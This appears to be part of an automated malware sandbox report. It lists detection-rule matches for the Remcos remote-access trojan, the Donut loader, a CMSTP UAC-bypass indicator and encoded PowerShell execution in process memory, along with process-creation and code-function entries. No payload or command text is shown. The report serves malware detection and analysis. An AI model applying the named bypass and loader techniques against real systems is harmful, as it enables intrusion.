                          Source: 00000045.00000002.4126743767.000000000594E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000027.00000002.2835021949.000000000585E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000001C.00000002.2537460873.0000000006013000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000045.00000002.4098617102.00000000058AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 0000001C.00000002.2539368391.00000000060B3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: 00000017.00000002.2388189406.00000000061C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 1720, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 1720, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 7980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 7980, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 5440, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 5440, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 6304, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 7240, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 7240, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 6492, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                          Source: Process Memory Space: powershell.exe PID: 6492, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_05EEE3A0 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,10_2_05EEE3A0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00402CAC NtdllDefWindowProc_A,18_2_00402CAC
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00402D66 NtdllDefWindowProc_A,18_2_00402D66
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_05EEE3A010_2_05EEE3A0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_004050C218_2_004050C2
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_004014AB18_2_004014AB
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0040513318_2_00405133
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_004051A418_2_004051A4
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0040124618_2_00401246
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0040CA4618_2_0040CA46
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0040523518_2_00405235
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_004032C818_2_004032C8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_0040168918_2_00401689
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00402F6018_2_00402F60
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\conhost.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4257
                          Source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 10.2.powershell.exe.8c21288.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 10.2.powershell.exe.8c21288.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 0000000A.00000002.2258141973.000000000B4F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 0000004F.00000002.4760119344.000000000651F000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000022.00000002.2751486587.0000000008A8C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0000000A.00000002.2241922716.0000000005E72000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000022.00000002.2680024924.0000000005BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000027.00000002.2852063246.0000000005AEA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 0000000A.00000002.2241212776.0000000005DD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000031.00000002.3210939044.00000000061AC000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 0000003B.00000002.3567174204.0000000005E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000040.00000002.3807374155.000000000599E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000031.00000002.3395971094.0000000008E8C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000027.00000002.2925202742.000000000863C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0000002C.00000002.3139004207.0000000008EEC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0000004F.00000002.4718019503.00000000064B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 0000003B.00000002.3891764993.000000000946C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0000002C.00000002.3033612985.000000000604C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000031.00000002.3206103808.000000000610C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000017.00000002.2417263077.000000000B815000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000045.00000002.4705414625.00000000086AC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0000001C.00000002.2582377571.0000000008F5C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000040.00000002.4282483846.000000000870C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0000000A.00000002.2257914268.0000000008CF8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0000001C.00000002.2582925458.000000000B6C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 0000004A.00000002.4498388098.000000000594F000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 0000000A.00000002.2257239795.0000000008C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0000002C.00000002.3028999049.0000000005FAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 0000003B.00000002.3579003629.0000000005EEE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 0000004A.00000002.4442121691.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000022.00000002.2682678594.0000000005C41000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000036.00000002.3545950157.00000000090EC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000017.00000002.2391539936.000000000644E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000040.00000002.3828451167.0000000005A3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000022.00000002.2752861386.000000000B251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000017.00000002.2416886326.000000000904C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000045.00000002.4126743767.000000000594E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                          Source: 00000027.00000002.2835021949.000000000585E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
